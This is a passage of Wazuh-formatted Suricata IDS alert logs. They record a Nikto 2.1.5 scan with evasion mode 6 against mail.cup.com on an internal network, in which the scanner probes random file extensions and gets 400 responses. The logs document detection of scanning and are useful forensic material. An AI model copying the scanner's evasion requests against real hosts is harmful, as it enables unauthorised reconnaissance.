HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":4,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.10623","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.349169+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46944,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.el\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.349169+0000","flow_id":"883960087990575.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46944","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.el","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.351261+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":5,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.12157","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.351261+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46946,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.idc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.351261+0000","flow_id":"455618704595240.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46946","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.idc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.353104+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":6,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.13693","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.353104+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46948,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.access\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.353104+0000","flow_id":"1306962827043002.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46948","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.access","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.355207+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":7,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.15237","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.355207+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46950,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.355207+0000","flow_id":"1369948522440834.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46950","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jsp+","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.358195+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":8,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.16777","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.358195+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46952,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.de\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.358195+0000","flow_id":"583080449044546.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46952","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.de","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.361389+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":9,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.18311","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.361389+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46954,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.en\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.361389+0000","flow_id":"570105352846820.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46954","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.en","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.365743+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":10,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.19845","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.365743+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46956,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.config\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.365743+0000","flow_id":"776469941489987.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46956","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.config","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.367902+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":11,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.21387","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.367902+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46958,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.et\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.367902+0000","flow_id":"829521377532493.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46958","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.et","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.370560+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":12,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.22921","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.370560+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46960,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.370560+0000","flow_id":"380826144121724.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46960","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cmd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.372779+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":13,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.24457","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.372779+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46962,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.372779+0000","flow_id":"319004384865496.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46962","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.x-shop","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.375251+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":14,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.25999","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.375251+0000\",\"flow_id\":1.67220255094931e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46964,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.375251+0000","flow_id":"1672202550949310.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46964","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dbc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.377295+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":15,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.27541","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.377295+0000\",\"flow_id\":2.17615683359514e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46966,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.map\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.377295+0000","flow_id":"2176156833595140.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46966","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.map","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.379849+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":16,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.29083","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.379849+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46968,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.379849+0000","flow_id":"1414354189338696.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46968","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.Big5","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.382662+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":17,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.30623","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.382662+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46970,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.382662+0000","flow_id":"268736087642508.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46970","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.10:100","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.385406+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":18,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.32165","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.385406+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46972,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.385406+0000","flow_id":"1931339402763667.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46972","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.nsf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.388338+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":19,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.33703","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.388338+0000\",\"flow_id\":2192726817433916,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46974,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.render_warning_screen\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.388338+0000","flow_id":"2192726817433916.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46974","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by 